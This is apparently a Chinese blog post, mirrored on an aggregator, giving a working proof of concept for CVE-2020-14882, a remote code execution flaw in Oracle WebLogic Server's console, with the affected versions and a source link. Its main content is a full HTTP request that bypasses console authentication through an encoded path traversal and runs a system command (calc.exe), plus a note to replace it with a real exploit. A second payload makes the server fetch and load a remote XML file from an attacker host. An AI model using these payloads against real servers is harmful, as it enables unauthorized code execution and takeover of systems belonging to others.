zoukankan      html  css  js  c++  java
  • 2020 weblogin rce CVE-2020-14882 漏洞利用POC

    漏洞来源

    根据P牛圈子告知,应该是长亭某研究员上报“voidfyoo”。
    细节由国外人员披露

    漏洞详情

    https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
    以上链接需要科-学-上网

    影响版本

    Oracle Weblogic Server 10.3.6.0.0
    Oracle Weblogic Server 12.1.3.0.0
    Oracle Weblogic Server 12.2.1.3.0
    Oracle Weblogic Server 12.2.1.4.0
    Oracle Weblogic Server 14.1.1.0.0

    poc

    GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22); HTTP/1.1
    Host: 192.168.3.189:7001
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: ADM
    Upgrade-Insecure-Requests: 1
    

    更改calc.exe 变成exp
    以上poc使用weblogin 12
    一下Poc需要使用服务器,适用于10
    http://127.0.0.1:7001/console/css/%2e%2e%2fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.184.1:8000/spel.xml")

  • 相关阅读:
    img[src*="same"]{}
    a[href$=".pdf"]解释
    ::selection{}
    a[href^=""]的解释
    who are you?
    天下武功唯快不破
    登录一下好吗??
    后台登录
    实验吧—简单的登录题
    hdu 1010
  • 原文地址:https://www.cnblogs.com/limanman233/p/13898453.html
Copyright © 2011-2022 走看看